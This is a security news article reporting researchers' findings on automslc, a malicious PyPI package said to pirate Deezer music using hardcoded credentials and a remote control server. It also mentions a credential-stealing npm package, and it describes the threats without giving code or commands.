Malicious PyPI Package "automslc" Enables 104K+ Unauthorized Deezer Music Downloads

Cybersecurity researchers have identified a harmful Python library named automslc on the Python Package Index (PyPI) that enables illegal music downloads from Deezer. Since its release in May 2019, the package has been downloaded more than 104,000 times and remains accessible on PyPI.

Deezer is a French music streaming service and media service provider founded in 2007 that provides users with access to a vast library of music tracks, podcasts, and radio stations. It offers streaming services in over 180 countries and features a catalog of more than 90 million licensed tracks, making it one of the largest streaming platforms available.

The automslc package claims to offer music automation and metadata retrieval but secretly bypasses Deezer's access limits by using hardcoded credentials. According to Socket security researcher Kirill Boychenko, it logs into Deezer using provided and embedded credentials, collects track-related data, and unlawfully downloads full audio files, violating Deezer's API terms.

This package also communicates with a remote server every so often to report on the download status, allowing the attacker to control the music piracy operation. In effect, automslc turns the computers of its users into an illegal network for mass music downloads. The associated IP address is linked to a domain called automusic[. ]win, which the threat actor uses to manage the downloading operation.

Deezer's API rules prohibit the local storage of complete audio files. By allowing users to download and decrypt entire tracks, automslc risks exposing them to possible legal actions. In a similar context, a problematic npm package named @ton-wallet/create has also been found stealing sensitive information from users in the TON ecosystem, underscoring the need for regular checks on third-party packages to ensure security.